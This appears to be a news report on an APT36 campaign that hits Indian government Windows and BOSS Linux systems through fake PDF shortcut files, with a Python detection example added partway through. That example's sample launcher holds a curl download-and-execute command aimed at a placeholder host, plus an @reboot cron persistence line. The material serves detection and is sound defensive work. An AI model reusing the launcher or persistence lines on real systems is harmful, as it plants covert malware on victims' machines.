Indian Govt Systems Hit: Hackers Use Fake Shortcut Files

Transparent Tribe (APT36), a hacker collective with ties to Pakistan, has once again come under fire for launching a new wave of cyberattacks against Indian government institutions.

A new cyber-espionage campaign targeting Indian government agencies has been discovered by researchers at cybersecurity firm CYFIRMA. In this campaign, attackers pose as harmless PDF documents to covertly install malware in the background using malicious desktop shortcut files.

How the attack works

The campaign starts with phishing emails that look like official meeting invitations and include a file called “Meeting_Ltr_ID1543ops.pdf.desktop,” according to CYFIRMA. Clicking on the attached file, which looks like a harmless document, causes victims to unintentionally run a malicious shortcut file that installs spyware in the background rather than opening a PDF.

The shortcut downloads the malware from attacker-controlled servers, such as securestore[.]cv and modgovindia[.]space, and installs it in the background. To avoid suspicion, a decoy PDF hosted on Google Drive is opened in Firefox, so the victim believes they have simply opened a meeting document.

The malware, which is written in the Go programming language, can enable long-term access, harvest login credentials, steal confidential information, and set up automated tasks to keep running even after a system reboot.

In a research blog post, CYFIRMA stated that “APT36’s ability to adapt its delivery mechanisms to the victim’s operating environment thereby increases its chances of success while maintaining persistent access to critical government infrastructure and evading traditional security controls.”

In contrast to previous campaigns, this one targets both Windows and Linux-based systems in India, including BOSS (Bharat Operating System Solutions), a government-sponsored Linux distribution.

The malware adds a cron job that executes the hidden payload “.config/systemd/systemd-update” each time the system reboots in order to remain persistent, making sure it continues to function even after shutdowns or process termination.
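The two artefacts described above, the launcher file dressed up as a PDF and the @reboot cron job pointing into a hidden dot-directory, can both be checked for on a Linux or BOSS endpoint. The following is an added detection example, not code from CYFIRMA's report; the .desktop contents, crontab lines and the URL are constructed for illustration (the URL is a placeholder).

```python
import configparser
import re

# Constructed sample .desktop entry with the traits described above (URL is a placeholder).
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Ltr_ID1543ops.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://example.invalid/u -o ~/.config/systemd/systemd-update; ~/.config/systemd/systemd-update; firefox https://drive.google.com/PLACEHOLDER"
"""
# Constructed crontab: one benign job, one @reboot job launched from a hidden dot-directory.
SAMPLE_CRONTAB = "0 3 * * * /usr/bin/backup --quiet\n@reboot /home/user/.config/systemd/systemd-update\n"

DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx")
DOWNLOADERS = re.compile(r"\b(curl|wget)\b")
SHELL_WRAPPERS = re.compile(r"\b(sh|bash|dash|zsh)\s+-c\b")
HIDDEN_PATH = re.compile(r"(~|\$HOME|/home/[^/\s]+)/\.[^\s;&|'\"]+")  # e.g. ~/.config/...

def parse_desktop_entry(text):
    """Parse the [Desktop Entry] group; keys are case-sensitive, so keep their case."""
    parser = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    parser.optionxform = str
    parser.read_string(text)
    return dict(parser["Desktop Entry"]) if parser.has_section("Desktop Entry") else {}

def assess_desktop_entry(filename, text):
    """Return human-readable findings for a launcher file; an empty list means no red flags."""
    entry = parse_desktop_entry(text)
    exec_line = entry.get("Exec", "")
    findings = []
    if filename.lower().endswith(".desktop") and filename.lower()[:-8].endswith(DOC_EXTENSIONS):
        findings.append("document-like double extension on a launcher file")
    if entry.get("Name", "").lower().endswith(DOC_EXTENSIONS) or entry.get("Icon") == "application-pdf":
        findings.append("launcher presents itself as a document")
    if SHELL_WRAPPERS.search(exec_line):
        findings.append("Exec wraps a shell command string")
    if DOWNLOADERS.search(exec_line):
        findings.append("Exec fetches remote content")
    if HIDDEN_PATH.search(exec_line):
        findings.append("Exec references a hidden dot-directory path")
    if findings and entry.get("Terminal", "").lower() == "false":
        findings.append("runs without a terminal, so the user sees nothing happen")
    return findings

def find_reboot_persistence(crontab_text):
    """Return @reboot crontab lines whose command lives in a hidden dot-directory."""
    return [ln.strip() for ln in crontab_text.splitlines()
            if ln.strip().startswith("@reboot") and HIDDEN_PATH.search(ln)]
```

Run `assess_desktop_entry` over files in ~/Desktop and ~/.local/share/applications and `find_reboot_persistence` over each user's `crontab -l` output; a genuine launcher such as a browser entry returns no findings.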

Given the widespread use of BOSS in government agencies, the hackers’ chances of success are increased by this dual-platform targeting.

How this matters

Security experts caution that Transparent Tribe's tactics have shifted from its customary Windows malware to threats built for Linux BOSS.

“A tactical shift toward utilizing local technologies is reflected in the use of .desktop payloads that target Linux BOSS. This demonstrates the group’s intention to diversify access vectors and guarantee persistence even in environments that have been hardened, in conjunction with conventional Windows-based malware and mobile implants,” according to CYFIRMA.

The group is also operating credential-harvesting websites that imitate Indian government portals, which compounds the risk. Phishing login pages trick victims into divulging their email address, password, and even Kavach two-factor authentication (2FA) codes; Kavach has been used by Indian agencies as a security measure since 2022. By bypassing this security layer, the attackers gain full access to sensitive accounts.

Long-term danger

Transparent Tribe, thought to be based in Pakistan, has regularly targeted Indian government, defense, and critical infrastructure institutions for more than ten years. Its tactics have gradually evolved from basic Windows-based malware to highly customized Linux backdoors and credential-theft schemes across South Asia.

Recommendations & Mitigation

Security researchers advise government workers to exercise caution when handling email attachments and login pages, since disguised PDFs and fake portals are being used to trick users into divulging their credentials.

To counter APT36’s campaign, which uses weaponized desktop files to target Indian government entities, agencies are advised to implement robust email security, train users regularly, and harden BOSS Linux with least-privilege controls. Endpoint detection, network monitoring, and the integration of IOCs and YARA rules will aid early detection, while timely patching and behavior-based controls are essential to stop suspicious activity.

The bigger game

The event highlights the dangers to national security that APT groups pose when they target government infrastructure. If successful, such attacks could allow for long-term surveillance of Indian agencies, disrupt vital operations, and result in the theft of classified data. India’s efforts to protect sensitive infrastructure from cyber-espionage are becoming more difficult as Transparent Tribe keeps improving its techniques.
